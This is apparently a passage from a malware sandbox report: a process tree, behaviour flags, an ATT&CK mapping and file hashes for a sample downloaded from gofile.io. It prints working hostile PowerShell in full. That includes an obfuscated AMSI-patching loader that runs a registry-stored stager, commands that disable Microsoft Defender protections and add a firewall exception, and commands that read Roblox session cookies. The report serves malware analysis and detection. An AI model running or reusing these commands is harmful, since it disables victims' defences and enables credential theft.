$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+'i'+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+'f'+'eNa'+[Char](116)+''+'i'+'v'+'e'+''+'M'+''+'e'+''+'t'+''+[Char](104)+''+[Char](111)+''+'d'+'s');$PdrWEvbBIfeSfd=$VtCvrZYfQqSEI.GetMethod(''+'G'+'etP'+[Char](114)+'o'+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EElRDQAJvXHbGtQECtB=kXeouvKYZuVv @([String])([IntPtr]);$KshgLjSkfWLTapqNDBsdHM=kXeouvKYZuVv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$sxakDWQKxds=$VtCvrZYfQqSEI.GetMethod(''+'G'+''+[Char](101)+'tMod'+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+'l'+'')));$vrBWwDjaiQIgZD=$PdrWEvbBIfeSfd.Invoke($Null,@([Object]$sxakDWQKxds,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$NCrPFWmrwrVUKDNAG=$PdrWEvbBIfeSfd.Invoke($Null,@([Object]$sxakDWQKxds,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+'ua'+[Char](108)+''+'P'+''+'r'+''+'o'+'t'+[Char](101)+''+'c'+''+[Char](116)+'')));$PTgCwNL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vrBWwDjaiQIgZD,$EElRDQAJvXHbGtQECtB).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i.'+'d'+''+[Char](108)+''+'l'+'');$lsyKGCOtwDLVsmQmZ=$PdrWEvbBIfeSfd.Invoke($Null,@([Object]$PTgCwNL,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$DDuLaWXyZk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NCrPFWmrwrVUKDNAG,$KshgLjSkfWLTapqNDBsdHM).Invoke($lsyKGCOtwDLVsmQmZ,[uint32]8,4,[ref]$DDuLaWXyZk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$lsyKGCOtwDLVsmQmZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NCrPFWmrwrVUKDNAG,$KshgLjSkfWLTapqNDBsdHM).Invoke($lsyKGCOtwDLVsmQmZ,[uint32]8,0x20,[ref]$DDuLaWXyZk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+'s'+[Char](116)+''+'a'+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4692 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3424
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1368
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1476
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1552
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2952
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1820
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004E42⤵PID:5728
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2016
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2052
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2252
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2660
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:1136
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3140
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3320 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/ZQ1rrZ2⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8a21d3cb8,0x7ff8a21d3cc8,0x7ff8a21d3cd83⤵PID:900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:23⤵PID:992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:4420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:83⤵PID:4432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:13⤵PID:4672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:13⤵PID:2096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:13⤵PID:4924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:13⤵PID:2596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:13⤵PID:4576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:13⤵PID:884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5632 /prefetch:83⤵PID:2216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3484 /prefetch:83⤵PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4428 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:1468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:83⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4832
-
-
C:\Users\Admin\Downloads\dll.exe"C:\Users\Admin\Downloads\dll.exe"3⤵
- Executes dropped EXE
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\$.exe"C:\Users\Admin\AppData\Local\Temp\$.exe"4⤵
- Executes dropped EXE
PID:2876
-
-
C:\Users\Admin\AppData\Local\Temp\$77.exe"C:\Users\Admin\AppData\Local\Temp\$77.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:488 -
C:\Users\Admin\$77-WindowsServices.exe"C:\Users\Admin\$77-WindowsServices.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:4716 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\$77-WindowsServices.exe" "$77-WindowsServices.exe" ENABLE6⤵
- Modifies Windows Firewall
PID:5992 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:6000
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\G-U.exe"C:\Users\Admin\AppData\Local\Temp\G-U.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4620 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\G-U.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵PID:4776
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵PID:3012
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
PID:5028
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:13⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:13⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:13⤵PID:1912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:13⤵PID:1020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,4344479853202987566,6890677393563941316,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4888 /prefetch:23⤵PID:2144
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3740
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3496
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3840
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3904
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3996
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3300
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1596
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4224
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4428
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1968
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1180
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2348
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:3024
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
40KB
MD5515dddc1463450c4311a3f8aed4d48a5
SHA1b9b0afa5ee77242e5bf31d895d34dd10e766aea2
SHA25656aacaa8b04d14b6d89377ab5784da6f0758324dccb330a480b0dd859b6c9dbc
SHA512469ac8b8f821c2e543071a058a03772f0067c3b49ffc6929ee6d750d4834d70e0b60506694f88028f7b2fd38969193f399228cbdb99863fb6efd099388369a5b
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
152B
MD56876cbd342d4d6b236f44f52c50f780f
SHA1a215cf6a499bfb67a3266d211844ec4c82128d83
SHA256ca5a6320d94ee74db11e55893a42a52c56c8f067cba35594d507b593d993451e
SHA512dff3675753b6b733ffa2da73d28a250a52ab29620935960673d77fe2f90d37a273c8c6afdf87db959bdb49f31b69b41f7aa4febac5bbdd43a9706a4dd9705039
-
Filesize
152B
MD5c1c7e2f451eb3836d23007799bc21d5f
SHA111a25f6055210aa7f99d77346b0d4f1dc123ce79
SHA256429a870d582c77c8a661c8cc3f4afa424ed5faf64ce722f51a6a74f66b21c800
SHA5122ca40bbbe76488dff4b10cca78a81ecf2e97d75cd65f301da4414d93e08e33f231171d455b0dbf012b2d4735428e835bf3631f678f0ab203383e315da2d23a34
-
Filesize
336KB
MD563c0fb4ddea47e0f27712ba3e313fee7
SHA14ad2c800a3c026045c5a88808b224228acc41da5
SHA256ab757200ccbaafbcd491bf6aac40e4c1d500d7b9cdd09a30646c2a211c0ff42a
SHA512328e3ab94f309766cd0165bfe94430b5b402f4490d22c1a64625ee9d09206cf62e58a0a23e16a3a20b5f87dd31da6e8d306ab99721c9a8b0a22420a156253452
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize288B
MD5f77c63a40a00245bc8615b4dd97f98c9
SHA1a5e6786d708ddf3bb5318cc6b665d91476a1ba69
SHA2566e0be3debce54e0a1e24340c26ddfea78486c245b97d5a3bf960c774bc068a60
SHA5121f40124752361a9359294d4e19e1bde3063300bf27a3141ef18bc94f9dbd02940dba554463ffd869a1e9bff3a6b4ba2b3e8bbf22c2a06e43c3f3f490a9e9be43
-
Filesize
438B
MD5b7faf09e8da38a51aba9ce168e644e77
SHA1dc82422a0ec1fd304759292c4535d52a60ccd7fa
SHA25600839b1f7be67f097306e308ebe5a2c7a8ea4e407ffb0922e9c3167bc8aa6ec3
SHA512a79e56c7a6153717a2db8524b2d1cd47251c300552ddfef5762c492b7e928c56d2ce24d2d093ce536be83d5024c03a4c28353b462eaa8433ae0bbf475657e72e
-
Filesize
317B
MD5afc6cddd7e64d81e52b729d09f227107
SHA1ad0d3740f4b66de83db8862911c07dc91928d2f6
SHA256b5e81a7c7d80feaaa10ee7bc8aaef9f21a5c1e4b03b3823ed115022311d674a0
SHA512844edb69585153c378a7c97709983776fc9303a32fb5ef8122ecca32adfc0b265f5ef7118ee07814da5c020ac7ba1bf2a2f66d46312e4d8e6df99aab2e5f9b2a
-
Filesize
5KB
MD5530921f210317b55635250545b49c961
SHA1dddcaee3ca3bff8b7b475b7bb036e630f0f3bff5
SHA2560b5f2c73c46f9f0091d1a49ed13ea5ac4684af90ef0428d26e66ec8d818cc869
SHA5128b39b73f97b05a58754c199b8a322015c6a1e0f3bac2d8d34eb7f1eef96d5485d1d91fed4ee3e77cc0262690ce271a74eb8a2ec7d235c8fa2a5c13f3105c1099
-
Filesize
6KB
MD5f06306924debc7204c982df57de0b073
SHA11d7fa44827a4df9c30f0a59a67eefaef3c0c32af
SHA25672456361ff12aae3b0cd91ff9e38e6a0888f4f2ae3f7a7af23853977ade212c1
SHA5121c2d10a751781bce99aa0ca9a41e1c1162fb0e99dadcca98542a3f8e0997d085d780c2c03bea7aba3d4fa2f7b78bf3a858d2ee92925743dcf04562e91dba101d
-
Filesize
6KB
MD55e9e3b40d8c7d0f995aebb1d523d14c9
SHA1ac4821c6ced30b640cba174defab5f1de60dcd00
SHA256dc98197c7a30dbe05b34fcaedb42b1a51fe47948b522983c2cb6b30705edebf6
